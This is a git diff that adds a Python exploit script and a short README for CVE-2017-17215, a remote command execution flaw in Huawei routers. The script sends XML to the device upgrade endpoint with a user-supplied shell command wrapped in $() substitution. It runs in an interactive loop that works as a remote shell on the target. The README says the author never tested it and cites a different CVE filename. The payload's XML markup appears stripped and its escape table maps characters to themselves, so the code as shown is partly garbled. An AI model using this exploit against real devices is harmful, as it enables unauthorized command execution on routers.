diff --git a/CVE_EXP/CVE-2017-17215/CVE-2017-17215.py b/CVE_EXP/CVE-2017-17215/CVE-2017-17215.py
new file mode 100644
index 0000000..a75e338
--- /dev/null
+++ b/CVE_EXP/CVE-2017-17215/CVE-2017-17215.py
@@ -0,0 +1,44 @@
+import requests
+import sys
+
+url_in = sys.argv[1]
+payload_url = url_in + "/ctrlt/DeviceUpgrade_1"
+payload_header = {'content-type': 'text/xml'}
+
+
+def payload_command (command_in):
+ html_escape_table = {
+ "&": "&",
+ '"': """,
+ "'": "'",
+ ">": ">",
+ "<": "<",
+ }
+ command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+""
+ payload_1 = "" \
+ " " \
+ " "\
+ " "\
+ " $("+command_filtered+" > /tmp/1337g) "\
+ " $(cat /tmp/1337g) "\
+ " "\
+ " " \
+ " "
+ return payload_1
+
+def do_post(command_in):
+ result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
+ print result.content
+
+
+
+
+print "***************************************************** \n" \
+ "**************** Coded By 1337g ****************** \n" \
+ "* CVE-2017-17215 Remote Command Execute EXP * \n" \
+ "***************************************************** \n"
+
+while 1:
+ command_in = raw_input("Eneter your command here: ")
+ if command_in == "exit" : exit(0)
+ do_post(command_in)
diff --git a/CVE_EXP/CVE-2017-17215/README.md b/CVE_EXP/CVE-2017-17215/README.md
new file mode 100644
index 0000000..6b618c1
--- /dev/null
+++ b/CVE_EXP/CVE-2017-17215/README.md
@@ -0,0 +1,4 @@
+# CVE-2017-17215
+Usage: CVE-2017-12149.py http://targetip:37215/
+I am so poor that cant afford to but a HUAWEI router XD so it is not tested on any machine~
+but the exp technically should be working